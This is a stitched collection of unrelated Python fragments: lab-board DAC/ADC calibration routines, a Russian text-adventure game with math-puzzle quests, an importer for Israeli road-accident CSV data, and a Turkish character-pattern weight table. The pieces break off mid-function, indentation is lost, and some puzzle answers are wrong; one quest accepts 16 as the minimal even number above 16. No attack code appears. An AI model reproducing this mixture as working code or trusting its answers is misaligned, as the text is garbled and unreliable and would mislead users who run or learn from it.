writeChannel(3,x)
time.sleep(0.1) # Wait a little
a1 = readADC(1) # ADC ratiometric read (with calibration)
a2 = readADC(2)
dac1y.append(a1) # Append read values
dac2y.append(a2)
if ndacs>=3:
a3 = readADC(3)
dac3y.append(a3)
prev1 = -1
# Check that each DAC calibration curve is monotonic.
# Iterate over the DAC sweep values (dacx) rather than the ADC calibration range,
# and pad the unused DAC tables so zip() does not stop early when fewer DACs exist.
y3list = dac3y if ndacs >= 3 else dac1y
y4list = dac4y if ndacs >= 4 else dac1y
for x,y1,y2,y3,y4 in zip(dacx,dac1y,dac2y,y3list,y4list):
if prev1 != -1:
if y1 < prev1:
raise SlabEx("Channel 1 is not monotonic")
if y2 < prev2:
raise SlabEx("Channel 2 is not monotonic")
if ndacs >= 3 and y3 < prev3:
raise SlabEx("Channel 3 is not monotonic")
if ndacs >= 4 and y4 < prev4:
raise SlabEx("Channel 4 is not monotonic")
prev1 = y1
prev2 = y2
prev3 = y3
prev4 = y4
# Show and save calibration data
_storeAndShowDACcalibration(ndacs)
# Restore the number of ADC readings
setDCreadings(lastDCR)
print()
print("Calibration of DACs completed")
print()
'''
@manualCalibrateDAC1@
manualCalibrateDAC1()
First stage of board calibration
Performs a manual calibration of DAC 1 against a voltage meter
Also calibrates Vdd and Vref
Returns nothing
Included in slab.py
'''
def manualCalibrateDAC1():
global vdd,vref,dacx,dac1y
print()
print("Manual calibration of DAC 1")
print("You will need a voltage measurement instrument (VM)" )
print()
print("Put VM between the Vdd terminal and GND")
print("Write down the voltage value and press enter")
print()
vdd = float(input("Voltage value [Volt]: "))
print()
print("Put VM between the buffered DAC 1 output and GND")
print("Write down the voltage value and press enter each time it is asked")
print()
# Increase number of readings for better calibration
lastDCR=setDCreadings(1000)
dacx = [0.0,0.02,0.1,0.5,0.9,0.98,1.0]
voltages = []
prevv = -1.0
for x in dacx:
writeChannel(1,x)
y = float(input("Voltage value [Volt]: "))
voltages.append(y)
if y < prevv:
raise SlabEx("Non monotonous. Cannot calibrate")
prevv = y
# Stores vdd and vref calibration
if voltages[3]*2.0 > voltages[6] :
setVref(voltages[3]*2.0, persistent=True)
else:
setVref(voltages[-1], persistent=True)
# Convert to ratiometric
dac1y = []
for v in voltages:
dac1y.append(v/vref)
# Store calibration
_storeAndShowDACcalibration(1)
# Restore the number of ADC readings
setDCreadings(lastDCR)
print()
print("Manual calibration of DAC 1 completed")
print()
'''
@checkCalibration@
checkCalibration()
Fourth and last stage of board calibration
Checks the board calibration
Shows the curves of DACs connected to ADCs
Returns nothing
Included in slab.py
'''
def checkCalibration():
print()
print("Calibration check")
print()
print("Connect the DAC outputs to ADC inputs with same number")
print("DAC 1 to ADC 1 and DAC2 to ADC2 and son on...")
print("Connect the rest of ADCs to DAC 1")
print()
input("Press [Return] to continue")
# Increase number of readings for better calibration
lastDCR=setDCreadings(400)
vmin = 0.1
vmax = vref - 0.1
R1 = dcSweep(1,vmin,vmax,0.2)
R2 = dcSweep(2,vmin,vmax,0.2)
if ndacs > 2:
R3 = dcSweep(3,vmin,vmax,0.2)
x = R1[0]
y1 = R1[1]
y2 = R2[2]
if ndacs > 2:
y3 = R3[3]
else:
y3 = R1[3]
y4 = R1[4]
for i in range(1,ndacs+1):
setVoltage(i,1.0)
message(1,"")
message(1,"DAC outputs shall be now 1V")
message(1,"They will be zero after closing the plot")
message(1,"")
plot1n(x,[y1,y2,y3,y4],"Final curves","DAC (V)","ADC (V)",["Ch1","Ch2","Ch3","Ch4"])
zero()
# Restore the number of ADC readings
setDCreadings(lastDCR)
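# Hedged sketch (not part of the original file): the four calibration stages above are
# intended to run in this order; this wrapper function is purely illustrative.
def _example_full_calibration():
    manualCalibrateDAC1()   # stage 1: DAC1 against an external voltmeter, sets Vdd/Vref
    adcCalibrate()          # stage 2: ADCs against DAC1
    dacCalibrate()          # stage 3: each DAC against its matching ADC
    checkCalibration()      # stage 4: sweep the DACs and plot the resulting curves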
'''
@dcPrint@
dcPrint()
Show readings of all four ADC channels on screen
Returns nothing
Included in slab.py
'''
def dcPrint():
a1 = readVoltage(1);
a2 = readVoltage(2);
a3 = readVoltage(3);
a4 = readVoltage(4);
print("ADC DC Values")
print(" ADC1 = "+"{0:.3f}".format(a1)+" V")
print(" ADC2 = "+"{0:.3f}".format(a2)+" V")
print(" ADC3 = "+"{0:.3f}".format(a3)+" V")
print(" ADC4 = "+"{0:.3f}".format(a4)+" V")
print()
'''
@zero@
zero()
Set all DACs to ratiometric zero
Does not use calibration
Returns nothing
Included in slab.py
'''
def zero():
for i in range(1,ndacs+1):
writeChannel(i,0.0);
message(2,"All DACs at zero")
'''
@dcLive@
dcLive(n,wt,single,returnData)
Prints live values of ADC voltages
Use CTRL+C to exit
Optional
######################################################################################################################
# "Abandoned House" ("Заброшенный дом") program
# Developed for ItFest 2021
######################################################################################################################
import random
from enumes import Location, TypeLocation
from texts import TextFinal, TextNotGoodEnd, TextGoodEnd
######################################################################################################################
# Engine Data
# Main description of the locations; depending on the location type, the parameter list may have a variable length:
# {key = [location type, text, exit options, quest data (optional)]}
# A location of type "place" simply describes a spot and offers exit choices.
# A location of type "quest" has only one exit, but it can only be left by solving the task (or you stay there and starve).
# A location of type "test" has 2 exits, but the exit is chosen by the function (script) of the same name rather than by the user;
# to keep things simple the script body is kept outside of GameData, although it could have been invoked entirely via eval.
# A small dispatch sketch illustrating this layout follows below.
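# Hedged illustration (not part of the original game): a tiny helper showing how the
# list layout documented above could be unpacked by an engine; the helper name is
# made up and GameData is only referenced lazily, at call time.
def _describe_location(key):
    entry = GameData[key]
    kind, text, exits = entry[0], entry[1], entry[2]
    quest_data = entry[3] if len(entry) > 3 else None  # only quest locations carry it
    return kind, text, exits, quest_data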
GameData = {
Location.front_of_house: [
TypeLocation.place,
'''
Вот Я перед домом.
Дом действительно очень старый и не менее страшный.
Дааа, и тут мне придётся ночевать.
Мне нужно решить, что мне делать:
1) Попытаться войти в дом.
2) Обойти дом по кругу.''',
[Location.first_floor_quest, Location.next_house]],
Location.first_floor_quest: [
TypeLocation.quest,
'На двери замок!',
[Location.first_floor], ['Надо вскрыть замок:', '(2 + 3) * 5 - 2 = x', '23', 'x = ']],
Location.next_house: [
TypeLocation.place,
'''
Я нахожусь около дома, под окном на второй этаж.
%rnd%
Тут очень сыро и холодно 🥶.
Я вижу что к окну идут лианы!
Мне нужно решить, что мне делать:
1) Попытаться залезть на второй этаж.
2) Подойти ко входу в дом.''',
[Location.first_room_quest, Location.front_of_house]],
Location.first_room_quest: [
TypeLocation.quest,
'''
Квест: Некоторые лианы засохли!
Надо найти свежие лианы.''',
[Location.first_room_test_inner], ['Найди закономерность!\nВставь вместо пропусков ответ:',
'101100111000____0000', '1111', '____ = ']],
Location.first_floor: [
TypeLocation.place,
'''
Я на первом этаже этого дома.
Надо тут осмотреться, убедиться в безопасности дома, как ночлега. 😴
Ливень снаружи, к сожалению, всё никак не прекращался.
Мне нужно решить, что мне предпринять:
1) Подняться на второй этаж.
2) Посмотреть что есть в подвале.
3) Зайти в комнату похожую на кухню.
4) Выйти из дома.''',
[Location.second_floor_1, Location.basement_test_inner, Location.kitchen_test_slingshot,
Location.front_of_house]],
Location.second_floor_1: [
TypeLocation.place,
'''
Я на втором этаже этого странного дома.
Но тут более приятное место для ночлега.
%rnd%
Надо осмотреть каждую комнату этого этажа.
Мне нужно решить, куда мне пойти:
1) Попытаться зайти в 1-ую комнату.
2) Попытаться зайти во 2-ую комнату.
3) Попытаться зайти в 3-ую комнату вроде "самую уютную".
4) Спуститься на первый этаж.''',
[Location.first_room_test, Location.second_room, Location.final_room_test, Location.first_floor]],
Location.second_floor_2: [
TypeLocation.place,
'''
Второй этаж этого "неблагоприятного" дома.
%rnd%
Мне нужно решить, куда мне пойти:
1) Попытаться зайти в 1-ую комнату.
2) Попытаться зайти во 2-ую комнату.
3) Попытаться зайти в 3-ую комнату вроде "самую уютную".
4) Спуститься на первый этаж.''',
[Location.first_room_test, Location.second_room, Location.final_room_test, Location.first_floor]],
Location.final_room_test: [
TypeLocation.test,
' Здесь замок, для которого нужно 2 ключа!',
[Location.final_room_quest, Location.second_floor_2]],
Location.final_room_quest: [
TypeLocation.quest,
'\tКвест: Осталось подобрать ключи\n\tНадо только узнать как?',
[Location.final_room_test_inner], ['\tДля этого реши систему уравнений:',
'\t2k + x = 1\nk + y = 13\ny + x = 2\n2k = ...', '8', '2k = ']],
Location.first_room_test: [
TypeLocation.test,
' Эта комната заперта с другой стороны!',
[Location.first_room_test_inner, Location.second_floor_2]],
Location.first_room_test_inner: [
TypeLocation.test,
'',
[Location.first_room_2, Location.first_room_quest_open]],
Location.first_room_quest_open: [
TypeLocation.quest,
'''
в этой комнате в первый раз. Она необычная и немного жутковатая!
В большом шкафу Я нашёл мистическую "математическую" шкатулку.
Квест: Хорошо, что Я люблю математику!''',
[Location.first_room_1],
['Откроем её!', 'x = sin(30) * 4', '2', 'x = '],
'Здесь лежит ключ!',
True],
Location.first_room_1: [
TypeLocation.place,
'''
Мне нужно решить, что мне делать:
1) Попытаться слезть по лиане с окна на улицу!
2) Выйти в коридор второго этажа.''',
[Location.next_house, Location.second_floor_1]],
Location.first_room_2: [
TypeLocation.place,
'''
В этой комнате Я уже всё осмотрел и открыл шкатулку.
Зачем я хожу кругами?
%rnd%
Надо действовать быстрее, а то Я здесь буду до утра всё проверять!
Мне нужно решить, что мне делать:
1) Попытаться слезть по лиане с окна на улицу!
2) Выйти в коридор второго этажа.''',
[Location.next_house, Location.second_floor_1]],
Location.second_room: [
TypeLocation.place,
'''
Эта комната открылась довольно дружелюбно.
Комната была небольшая, но здесь была лестница на чердак.
%rnd%
В комнате Я не нашёл ни одной вещи, которая мне могла бы пригодиться.
Тут-же Я заметил, что крыжа протекает, так себе ночлег!
Мне нужно решить, куда идти:
1) Подняться на чердак.
2) Вернуться обратно в коридор.''',
[Location.attic, Location.second_floor_1]],
Location.attic: [
TypeLocation.place,
'''
Пока Я лез на пыльный чердак, наглотался паутины 🕸!
%rnd%
Тут было довольно просторно.
Надо изучить всё пространство.
Мне нужно решить, что мне делать:
1) Спустится обратно, через пауков 🕷.
2) Вылезть через щель в 1-ую комнату.
3) Зайти в дальний конец чердака.''',
[Location.second_room, Location.first_room_test_inner, Location.attic_test_inner]],
Location.attic_test_inner: [
TypeLocation.test,
'',
[Location.attic_down]],
Location.attic_down: [
TypeLocation.place,
'''
В чердаке оказалась "пробоина", Я громко свалился на первый этаж.
Когда пришёл в сознание, всё ужасно болело, мне было страшно.
Хорошо, что Я выжил после такого. Ведь мог бы и не выжить!''',
[Location.first_floor]],
Location.basement_test_inner: [
TypeLocation.test,
'',
[Location.basement_2, Location.basement_quest]],
Location.basement_quest: [
TypeLocation.quest,
'''
Вот я уже в тёмном подвале этого дома.
%rnd%
Тут уж точно место не для ночлега.
Стоп, тут есть какая-то шкатулка.''',
[Location.basement_1],
['Эта шкатулка хитро закрыта, попробую открыть:', '2x + 3 = 3x - 4\nx = ...', '7', 'x = '],
'\tВ шкатулке был ключ! Возьму вдруг пригодиться.',
True],
Location.basement_1: [
TypeLocation.place,
'''
Мне нужно решить, что мне делать дальше:
1) Вернуться в этот дом.
2) Вылезть через маленькое окно в подвале "Попытаться".''',
[Location.first_floor, Location.small_window_quest]],
Location.basement_2: [
TypeLocation.place,
'''
Вот я уже в тёмном подвале этого дома.
%rnd%
Тут уж точно место не для ночлега.
Эту шкатулку я уже видел!
Зачем я хожу кругами?
Мне нужно решить, что мне делать дальше:
1) Вернуться в этот дом.
2) Вылезть через маленькое окно в подвале "Попытаться".''',
[Location.first_floor, Location.small_window_quest]],
Location.small_window_quest: [
TypeLocation.quest,
'''
Ну что-ж, попытка не пытка! Надеюсь)''',
[Location.next_house], ['Надо пролезть, подбери минимальное значение:',
'Минимальное "n" если (n > 16) и (n - чётное число)', '16', 'n = '],
'\tНаконец-то!'], # 'min(n) if n > 14 and n % 2 == 0'
Location.kitchen_test_slingshot: [
TypeLocation.test,
'',
[Location.kitchen_1, Location.kitchen_2]],
Location.kitchen_1: [
TypeLocation.place,
'''
А вспомнил, я тут уже был и взял рогатку, возвращаемся обратно.
''',
[Location.first_floor]],
Location.kitchen_3: [
TypeLocation.place,
'''
Остается только вернуться в хол и поискать ключ.
''',
[Location.first_floor]],
Location.kitchen_4: [
TypeLocation.place,
'''
Ящик открылся, я был сильно напуган увидев череп какого-то лесного животного-хищника,
Ещё тут было много тараканов и пахло не очень. Зато тут была хорошая рогатка.
Она была стальная с бронзовыми шариками-снарядами, ладно возьму с собой.
Тут где-то в доме упала стеклянная ваза. Может это крысы бегают по столам?
Возвращаемся в комнату, тут больше делать нечего.
''',
[Location.first_floor]],
Location.kitchen_2: [
TypeLocation.place,
'''
Я зашёл в комнату, похожую на кухню.
Выглядела она ужасно, везде пахло гноем.
Во всей комнате не было ничего дельного.
Комната была пуста, хоть тут и было много различных шкафов!
Один, кстати, закрыт, может хоть в нём что-то есть!
%rnd%
Похоже придётся возвращаться или ... :
1) Вернуться обратно.
2) Осмотреть шкаф. ''',
[Location.first_floor, Location.kitchen_test_key]],
Location.kitchen_test_key: [
TypeLocation.test,
'''
Упс. Шкаф закрыт! Мне нужен ключ для шкафа.''',
[Location.kitchen_quest, Location.kitchen_3]],
Location.kitchen_quest: [
TypeLocation.quest,
'''
У меня как-раз есть отмычка, придётся потрудиться!''',
[Location.kitchen_4],
['Надо настроить нашу отмычку!', '|(4 * 2 - 6) ** 3 - 3| * 111 = ...', '555', 'Ответ: '],
'',
True],
# ['Надо настроить отмычку под форму замка:"_" - пропуск, а "|" - палочка!',
# 'Замок: ________________________\n | || || ||| | || ', # Не работает!!!
# '_||__||__||___|_|__|', 'Ключик: ____', True],
Location.final_room_test_inner: [
TypeLocation.test,
'',
[Location.final_room_1, Location.final_room_2]],
Location.final_room_1: [
TypeLocation.place,
TextFinal + '''
3) Оглушить ударом снаряда рогатки, и кинуться по лестнице на улицу! (активно - вы нашли рогатку)''',
[Location.end_test_1, Location.end_2, Location.end_3]],
Location.final_room_2: [
TypeLocation.place,
TextFinal + '''
3) [блок] Оглушить ударом снаряда рогатки, и кинуться по лестнице на улицу! (вы не нашли рогатку)''',
[Location.end_test_1, Location.end_2]],
Location.end_2: [
TypeLocation.place,
'''
Я бросился, что есть мочи к выходу! Оно не отставало.
Я вышиб старую дверь ногой и собирался бежать в лес... ''' + TextNotGoodEnd,
[Location.end]],
Location.end_3: [
TypeLocation.place,
'''
Я не знаю как, но я "случайно" попал ему в грудь!
# -*- coding: utf-8 -*-
import glob
import os
import json
from collections import OrderedDict
import itertools
import re
from datetime import datetime
import six
from six import iteritems
from flask.ext.sqlalchemy import SQLAlchemy
from sqlalchemy import or_
from .. import field_names, localization
from ..models import AccidentMarker, Involved, Vehicle
from .. import models
from ..utilities import ItmToWGS84, init_flask, CsvReader, time_delta, decode_hebrew, ImporterUI, truncate_tables
from functools import partial
import logging
failed_dirs = OrderedDict()
CONTENT_ENCODING = 'cp1255'
ACCIDENT_TYPE_REGEX = re.compile(r"Accidents Type (?P<type>\d)")
ACCIDENTS = 'accidents'
CITIES = 'cities'
STREETS = 'streets'
ROADS = "roads"
URBAN_INTERSECTION = 'urban_intersection'
NON_URBAN_INTERSECTION = 'non_urban_intersection'
DICTIONARY = "dictionary"
INVOLVED = "involved"
VEHICLES = "vehicles"
cbs_files = {
ACCIDENTS: "AccData.csv",
URBAN_INTERSECTION: "IntersectUrban.csv",
NON_URBAN_INTERSECTION: "IntersectNonUrban.csv",
STREETS: "DicStreets.csv",
DICTIONARY: "Dictionary.csv",
INVOLVED: "InvData.csv",
VEHICLES: "VehData.csv"
}
coordinates_converter = ItmToWGS84()
app = init_flask()
db = SQLAlchemy(app)
json_dumps = partial(json.dumps, encoding=models.db_encoding) if six.PY2 else json.dumps
def get_street(settlement_sign, street_sign, streets):
"""
extracts the street name using the settlement id and street id
"""
if settlement_sign not in streets:
# Changed to return blank string instead of None for correct presentation (Omer)
return u""
street_name = [decode_hebrew(x[field_names.street_name]) for x in streets[settlement_sign] if
x[field_names.street_sign] == street_sign]
# there should be only one street name, or none if it wasn't found.
return street_name[0] if len(street_name) == 1 else u""
def get_address(accident, streets):
"""
extracts the address of the main street.
tries to build the full address: <street_name> <street_number>, <settlement>,
but might return a partial one if unsuccessful.
"""
street = get_street(accident[field_names.settlement_sign], accident[field_names.street1], streets)
if not street:
return u""
# the home field is invalid if it's empty or if it contains 9999
home = accident[field_names.home] if accident[field_names.home] != 9999 else None
settlement = localization.get_city_name(accident[field_names.settlement_sign])
if not home and not settlement:
return street
if not home and settlement:
return u"{}, {}".format(street, settlement)
if home and not settlement:
return u"{} {}".format(street, home)
return u"{} {}, {}".format(street, home, settlement)
def get_streets(accident, streets):
"""
extracts the streets the accident occurred in.
every accident has a main street and a secondary street.
:return: a tuple containing both streets.
"""
main_street = get_address(accident, streets)
secondary_street = get_street(accident[field_names.settlement_sign], accident[field_names.street2], streets)
return main_street, secondary_street
def get_junction(accident, roads):
"""
extracts the junction from an accident
omerxx: added the "km" parameter to the calculation so that only the right junction is shown;
every non-urban accident shows the nearest junction with distance and direction
:return: the junction name, or an empty string if it wasn't found
"""
if accident["KM"] is not None and accident[field_names.non_urban_intersection] is None:
min_dist = 100000
key = (), ()
junc_km = 0
for option in roads:
if accident[field_names.road1] == option[0] and abs(accident["KM"]-option[2]) < min_dist:
min_dist = abs(accident["KM"]-option[2])
key = accident[field_names.road1], option[1], option[2]
junc_km = option[2]
junction = roads.get(key, None)
if junction:
if accident["KM"] - junc_km > 0:
direction = u"צפונית" if accident[field_names.road1] % 2 == 0 else u"מזרחית"
else:
direction = u"דרומית" if accident[field_names.road1] % 2 == 0 else u"מערבית"
if abs(float(accident["KM"] - junc_km)/10) >= 1:
string = str(abs(float(accident["KM"])-junc_km)/10) + u" ק״מ " + direction + u" ל" + \
decode_hebrew(junction)
elif 0 < abs(float(accident["KM"] - junc_km)/10) < 1:
string = str(int((abs(float(accident["KM"])-junc_km)/10)*1000)) + u" מטרים " + direction + u" ל" + \
decode_hebrew(junction)
else:
string = decode_hebrew(junction)
return string
else:
return u""
elif accident[field_names.non_urban_intersection] is not None:
key = accident[field_names.road1], accident[field_names.road2], accident["KM"]
junction = roads.get(key, None)
return decode_hebrew(junction) if junction else u""
else:
return u""
def parse_date(accident):
"""
parses an accident's date
"""
year = accident[field_names.accident_year]
month = accident[field_names.accident_month]
day = accident[field_names.accident_day]
'''
hours calculation explanation - the hour value is between 1 and 96;
each value represents a 15-minute slot starting at 00:00:
1 equals 00:00, 2 equals 00:15, 3 equals 00:30 and so on.
'''
minutes = accident[field_names.accident_hour] * 15 - 15
hours = int(minutes // 60)
minutes %= 60
accident_date = datetime(year, month, day, hours, minutes, 0)
return accident_date
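# Worked example for the 1..96 hour encoding above (illustrative): an
# accident_hour value of 1 maps to 00:00, a value of 5 gives
# minutes = 5 * 15 - 15 = 60, i.e. 01:00, and a value of 96 maps to 23:45.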
def load_extra_data(accident, streets, roads):
"""
loads more data about the accident
:return: a dictionary containing all the extra fields and their values
:rtype: dict
"""
extra_fields = {}
# if the accident occurred in an urban setting
if bool(accident[field_names.urban_intersection]):
main_street, secondary_street = get_streets(accident, streets)
if main_street:
extra_fields[field_names.street1] = main_street
if secondary_street:
extra_fields[field_names.street2] = secondary_street
# if the accident occurred in a non urban setting (highway, etc')
if bool(accident[field_names.non_urban_intersection]):
junction = get_junction(accident, roads)
if junction:
extra_fields[field_names.junction_name] = junction
# localize static accident values
for field in localization.get_supported_tables():
# if we have a localized field for that particular field, save the field value
# it will be fetched when the marker is deserialized
if accident[field] and localization.get_field(field, accident[field]):
extra_fields[field] = accident[field]
return extra_fields
def get_data_value(value):
"""
:returns: value for parameters which are not mandatory in an accident data
OR -1 if the parameter value does not exist
"""
return int(value) if value else -1
def import_accidents(provider_code, accidents, streets, roads, **kwargs):
logging.info("\tReading accident data from '%s'..." % os.path.basename(accidents.name()))
markers = []
for accident in accidents:
if field_names.x_coordinate not in accident or field_names.y_coordinate not in accident:
raise ValueError("Missing x and y coordinates")
if accident[field_names.x_coordinate] and accident[field_names.y_coordinate]:
lng, lat = coordinates_converter.convert(accident[field_names.x_coordinate],
accident[field_names.y_coordinate])
else:
lng, lat = None, None # Must insert everything to avoid foreign key failure
main_street, secondary_street = get_streets(accident, streets)
assert(int(provider_code) == int(accident[field_names.file_type]))
marker = {
"id": int(accident[field_names.id]),
"provider_code": int(provider_code),
"title": "Accident",
"description": json_dumps(load_extra_data(accident, streets, roads)),
"address": get_address(accident, streets),
"latitude": lat,
"longitude": lng,
"subtype": int(accident[field_names.accident_type]),
"severity": int(accident[field_names.accident_severity]),
"created": parse_date(accident),
"locationAccuracy": int(accident[field_names.igun]),
"roadType": int(accident[field_names.road_type]),
"roadShape": int(accident[field_names.road_shape]),
"dayType": int(accident[field_names.day_type]),
"unit": int(accident[field_names.unit]),
"mainStreet": main_street,
"secondaryStreet": secondary_street,
"junction": get_junction(accident, roads),
"one_lane": get_data_value(accident[field_names.one_lane]),
"multi_lane": get_data_value(accident[field_names.multi_lane]),
"speed_limit": get_data_value(accident[field_names.speed_limit]),
"intactness": get_data_value(accident[field_names.intactness]),
"road_width": get_data_value(accident[field_names.road_width]),
"road_sign": get_data_value(accident[field_names.road_sign]),
"road_light": get_data_value(accident[field_names.road_light]),
"road_control": get_data_value(accident[field_names.road_control]),
"weather": get_data_value(accident[field_names.weather]),
"road_surface": get_data_value(accident[field_names.road_surface]),
"road_object": get_data_value(accident[field_names.road_object]),
"object_distance": get_data_value(accident[field_names.object_distance]),
"didnt_cross": get_data_value(accident[field_names.didnt_cross]),
"cross_mode": get_data_value(accident[field_names.cross_mode]),
"cross_location": get_data_value(accident[field_names.cross_location]),
"cross_direction": get_data_value(accident[field_names.cross_direction]),
"road1": get_data_value(accident[field_names.road1]),
"road2": get_data_value(accident[field_names.road2]),
"km": float(accident[field_names.km]) if accident[field_names.km] else None,
"yishuv_symbol": get_data_value(accident[field_names.yishuv_symbol]),
"geo_area": get_data_value(accident[field_names.geo_area]),
"day_night": get_data_value(accident[field_names.day_night]),
"day_in_week": get_data_value(accident[field_names.day_in_week]),
"traffic_light": get_data_value(accident[field_names.traffic_light]),
"region": get_data_value(accident[field_names.region]),
"district": get_data_value(accident[field_names.district]),
"natural_area": get_data_value(accident[field_names.natural_area]),
"minizipali_status": get_data_value(accident[field_names.minizipali_status]),
"yishuv_shape": get_data_value(accident[field_names.yishuv_shape]),
}
markers.append(marker)
return markers
def import_involved(provider_code, involved, **kwargs):
logging.info("\tReading involved data from '%s'..." % os.path.basename(involved.name()))
involved_result = []
for involve in involved:
if not involve[field_names.id]: # skip lines with no accident id
continue
involved_result.append({
"accident_id": int(involve[field_names.id]),
"provider_code": int(provider_code),
"involved_type": int(involve[field_names.involved_type]),
"license_acquiring_date": int(involve[field_names.license_acquiring_date]),
"age_group": int(involve[field_names.age_group]),
"sex": get_data_value(involve[field_names.sex]),
"car_type": get_data_value(involve[field_names.car_type]),
"safety_measures": get_data_value(involve[field_names.safety_measures]),
"home_city": get_data_value(involve[field_names.home_city]),
"injury_severity": get_data_value(involve[field_names.injury_severity]),
"injured_type": get_data_value(involve[field_names.injured_type]),
"Injured_position": get_data_value(involve[field_names.injured_position]),
"population_type": get_data_value(involve[field_names.population_type]),
"home_district": get_data_value(involve[field_names.home_district]),
"home_nafa": get_data_value(involve[field_names.home_nafa]),
"home_area": get_data_value(involve[field_names.home_area]),
"home_municipal_status": get_data_value(involve[field_names.home_municipal_status]),
"home_residence_type": get_data_value(involve[field_names.home_residence_type]),
"hospital_time": get_data_value(involve[field_names.hospital_time]),
"medical_type": get_data_value(involve[field_names.medical_type]),
"release_dest": get_data_value(involve[field_names.release_dest]),
"safety_measures_use": get_data_value(involve[field_names.safety_measures_use]),
"late_deceased": get_data_value(involve[field_names.late_deceased]),
})
return involved_result
def import_vehicles(provider_code, vehicles, **kwargs):
logging.info("\tReading vehicles data from '%s'..." % os.path.basename(vehicles.name()))
vehicles_result = []
for vehicle in vehicles:
vehicles_result.append({
"accident_id": int(vehicle[field_names.id]),
"provider_code": int(provider_code),
"engine_volume": int(vehicle[field_names.engine_volume]),
"manufacturing_year": get_data_value(vehicle[field_names.manufacturing_year]),
"driving_directions": get_data_value(vehicle[field_names.driving_directions]),
"vehicle_status": get_data_value(vehicle[field_names.vehicle_status]),
"vehicle_attribution": get_data_value(vehicle[field_names.vehicle_attribution]),
"vehicle_type": get_data_value(vehicle[field_names.vehicle_type]),
"seats": get_data_value(vehicle[field_names.seats]),
"total_weight": get_data_value(vehicle[field_names.total_weight]),
})
return vehicles_result
def get_files(directory):
for name, filename in iteritems(cbs_files):
if name not in (STREETS, NON_URBAN_INTERSECTION, ACCIDENTS, INVOLVED, VEHICLES):
continue
files = [path for path in os.listdir(directory)
if filename.lower() in path.lower()]
amount = len(files)
if amount == 0:
raise ValueError("Not found: '%s'" % filename)
if amount > 1:
raise ValueError("Ambiguous: '%s'" % filename)
csv = CsvReader(os.path.join(directory, files[0]), encoding="cp1255")
if name == STREETS:
streets_map = {}
for settlement in itertools.groupby(csv, lambda street: street.get(field_names.settlement, "OTHER")):
key, val = tuple(settlement)
streets_map[key] = [{field_names.street_sign: x[field_names.street_sign],
field_names.street_name: x[field_names.street_name]} for x in val if
field_names.street_name in x and field_names.street_sign in x]
csv.close()
yield name, streets_map
elif name == NON_URBAN_INTERSECTION:
roads = {(x[field_names.road1], x[field_names.road2], x["KM"]): x[field_names.junction_name] for x in csv if
field_names.road1 in x and field_names.road2 in x}
csv.close()
yield ROADS, roads
elif name in (ACCIDENTS, INVOLVED, VEHICLES):
yield name, csv
def chunks(l, n, xrange):
"""Yield successive n-sized chunks from l."""
for i in xrange(0, len(l), n):
yield l[i:i + n]
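# Usage sketch (illustrative): chunks([1, 2, 3, 4, 5], 2, range) yields
# [1, 2], [3, 4] and finally [5]; the xrange argument lets the caller pass
# Python 2's xrange or Python 3's range, as import_to_datastore does below.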
def import_to_datastore(directory, provider_code, batch_size):
"""
goes through all the files in a given directory, parses and commits them
"""
try: xrange
except NameError:
xrange = range
try:
assert batch_size > 0
files_from_cbs = dict(get_files(directory))
if len(files_from_cbs) == 0:
return 0
logging.info("Importing '{}'".format(directory))
started = datetime.now()
new_items = 0
all_existing_accidents_ids = set(map(lambda x: x[0], db.session.query(AccidentMarker.id).all()))
accidents = import_accidents(provider_code=provider_code, **files_from_cbs)
accidents = [accident for accident in accidents if accident['id'] not in all_existing_accidents_ids]
new_items += len(accidents)
for accidents_chunk in chunks(accidents, batch_size, xrange):
db.session.bulk_insert_mappings(AccidentMarker, accidents_chunk)
all_involved_accident_ids = set(map(lambda x: x[0], db.session.query(Involved.accident_id).all()))
involved = import_involved(provider_code=provider_code, **files_from_cbs)
involved = [x for x in involved if x['accident_id'] not in all_involved_accident_ids]
for involved_chunk in chunks(involved, | |
"Xampi": 3160, " iXb": 3161, " koX": 3162,
" Xub": 3163, "Xart": 3164, "IXik": 3165, "aXir": 3166, " iXte ": 3167,
" baXin ": -3168, "reXm": -3169, "OnUX": 3170, "uXa": 3171, "Xci": 3172,
"aXki": -3173, "Xyo": -3174, "Xeh": 3175, "Xal": -3176, " aXa": 3177,
"eXit": 3178, "miXt": 3179, "Xekil": 3180, "ruluX": 3181, " giriX": 3182,
"brIX": -3183, " beX": 3184, " Xu ": 3185, "daX": 3186, " kIX": -3187,
"muX ": 3188, "Xirke": 3189, "Xoyle ": 3190, " iX ": 3191, " taXi": 3192,
" Xey": 3193, "GiX": 3194, " gOrUX": 3195, "laX": 3196, "Ximdi": 3197,
"dIX": 3198, "IXi": -3199, "liXk": 3200, " yaX": 3201, "aX ": 3202,
" kiXi": 3203, "iXle": 3204, "uXtu": 3205, "miX ": 3206, " dUX": 3207,
" karXi": 3208, "Xtir": 3209, "Xm": 3210, "IX": 3211, "baX": 3212, "X": -3213},
u'u': {"Xctugu": -1, " ay sX": 2, "fXtur ": 3, "Xysuz ": -4,
"Gi rXs": -5, "an Xnv": 6, "Xldeni": -7, "dIn Xn": 8, "i kXcu": 9,
"43 sX ": 10, "Xcunda": -11, "g kulX": 12, " aC kX": -13, "Xrunda": -14,
"lI tXt": -15, "pon bX": 16, "ok bXy": 17, "z abdX": -18, "mamXlu": -19,
"Xllah ": -20, "im sXl": 21, "ne gXn": 22, "Xstafa": -23, " en bX": 24,
"bXlet": 25, "CustX": 26, "ep lX": 27, "Us yX": 28, "as X ": 29,
"tXtki": 30, " fXru": 31, "hU sX": 32, "c itX": -33, "i tX ": 34,
"n lXx": 35, "u Xs ": 36, "SundX": 37, "lm X ": 38, "m Xs ": 39,
"okXme": -40, "gOzXc": -41, "zangX": 42, "Xrtum": 43, "S sXz": 44,
"Xtaas": -45, "Xktio": -46, " nXsu": -47, " mayX": -48, "atarX": 49,
"CayXs": 50, " ayhX": 51, "bu X ": 52, "Ors X": 53, "orsXd": 54,
"ergXt": -55, "Xrats": -56, "cXmul": 57, "Xslam": 58, "Xnsan": -59,
"mXstt": -60, "Xltad": -61, "Xnett": 62, "m sXk": -63, "Xlmut": -64,
"CXku ": 65, "evarX": 66, "lXylu": 67, "thXri": 68, "rakX ": -69,
"jektX": 70, "Xrsad": 71, "alXle": -72, "u iCX": -73, "ttXrs": 74,
"65 X ": 75, " bXsl": -76, "Ul Xs": -77, "kXsuf": 78, "Xteki": -79,
"4 tX ": 80, "a kX ": 81, "rUkX ": -82, "kUslX": 83, "rtikX": 84,
"mXsub": 85, " Xndu": 86, "uritX": -87, "OnktX": 88, "sXlie": 89,
"cUdXn": -90, "m Xsk": 91, "ec tX": 92, "mnibX": -93, "Ol dX": 94,
